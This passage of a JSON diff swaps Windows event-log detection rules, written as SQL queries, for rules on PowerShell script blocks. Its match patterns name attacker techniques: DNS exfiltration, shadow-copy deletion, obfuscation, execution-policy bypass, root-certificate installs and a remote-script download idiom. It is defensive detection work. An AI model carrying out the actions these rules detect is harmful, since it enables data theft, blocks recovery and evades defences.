[Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate script" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND (processPath LIKE '%\\\\powershell.exe' ESCAPE '\\' OR processPath LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_bits_client_susp_powershell_job.yml" - }, - { - "title": "Suspicious Download File Extension with BITS", - "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "frack113", + "filename": "posh_ps_invoke_dnsexfiltration.yml" + }, + { + "title": "PowerShell Deleted Mounted Share", + "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "status": "test", + "description": "Detects when when a mounted share is 
removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1070.005" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Administrators or Power users may remove their shares via cmd line" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT (LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_file.yml" + "filename": "posh_ps_susp_mounted_share_deletion.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell WindowStyle Option", + "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "status": "test", + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", + "author": "frack113, Tim Shelton (fp AWS)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1564.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%Hidden%' ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_susp_windowstyle.yml" }, { - "title": "Download with BITS to Suspicious Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1216" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' 
ESCAPE '\\')" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", + "title": "PowerShell Hotfix Enumeration", + "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery" ], "falsepositives": [ - "Unknown" + "Legitimate administration scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_hotfix_enum.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "title": "Invoke-Obfuscation Via Use Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft 
Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Suspicious Digital Signature Of AppX Package", - "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", - "status": "experimental", - "description": "Detects execution of AppX packages with known suspicious or malicious signature", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Powershell Detect Virtualization Environment", + "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "status": "test", + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", + "author": "frack113, Duc.Le-GTSC", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1497.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee 
Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" ], - "filename": "win_appxpackaging_om_sups_appx_signature.yml" + "filename": "posh_ps_detect_vm_env.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Root Certificate Installed - PowerShell", + "id": "42821614-9264-4761-acfc-5772c3286f76", + "status": "experimental", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.defense_evasion", + "attack.t1553.004" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_root_certificate_installed.yml" }, { - "title": "Suspicious Application Installed", - "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", + "title": "Potential PowerShell Obfuscation Using Character Join", + "id": "e8314f79-564d-4f79-bc13-fbc0bf2660d8", "status": "experimental", - "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", + "description": "Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.execution", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Packages or applications being legitimately used by users or administrators" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE '%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' 
ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Alias%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Value (-join(%' ESCAPE '\\')" ], - "filename": "win_shell_core_susp_packages_installed.yml" + "filename": "posh_ps_susp_alias_obfscuation.yml" }, { - "title": "USB Device Plugged", - "id": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", - "status": "test", - "description": "Detects plugged/unplugged USB devices", - "author": "Florian Roth (Nextron Systems)", + "title": "Change PowerShell Policies to an Insecure Level - PowerShell", + "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", + "status": "experimental", + "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "author": "frack113", "tags": [ - "attack.initial_access", - "attack.t1200" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative activity" + "Administrator script" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-DriverFrameworks-UserMode/Operational' AND EventID IN ('2003', '2100', '2102'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": 
"win_usb_device_plugged.yml" + "filename": "posh_ps_set_policies_to_unsecure_level.yml" }, { - "title": "Suspicious Rejected SMB Guest Logon From IP", - "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "title": "Execute Invoke-command on Remote Host", + "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", "status": "test", - "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", - "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1110.001" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Account fallback reasons (after failed login with specific account)" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" ], - "filename": "win_susp_failed_guest_logon.yml" + "filename": "posh_ps_invoke_command_remote.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", - "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", + "title": "Suspicious Get Information for SMB Share", + "id": "95f0643a-ed40-467c-806b-aac9542ec5ab", + "status": "test", + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of 
information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.privilege_escalation" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-smbshare%' ESCAPE '\\')" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_susp_smb_share_reco.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", - "status": "experimental", - "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious SSL Connection", + "id": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", + "status": "test", + "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent 
protections provided by a communication protocol.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1573" ], "falsepositives": [ - "Legitimate package hosted on a known and authorized remote location" + "Legitimate administrative script" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.Security.SslStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.Security.RemoteCertificateValidationCallback%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AuthenticateAsClient%' ESCAPE '\\')" ], - "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" + "filename": "posh_ps_susp_ssl_keyword.yml" }, { - "title": "Direct Syscall of NtOpenProcess", - "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", - "status": "experimental", - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "author": "Christian Burkard (Nextron Systems), Tim Shelton", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "status": "test", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR 
(TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" ], - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" + "filename": "posh_ps_susp_win32_shadowcopy.yml" }, { - "title": "SysmonEnte Usage", - "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", + "id": 
"20e5497e-331c-4cd5-8d36-935f6e2a9a07", "status": "experimental", - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "proc_access_win_hack_sysmonente.yml" + "filename": "posh_ps_invoke_obfuscation_via_compress.yml" }, { - "title": "Suspicious LSASS Access Via MalSecLogon", - "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "title": "Powershell Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "status": "experimental", - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "author": "Samir Bousseaden (original elastic rule), 
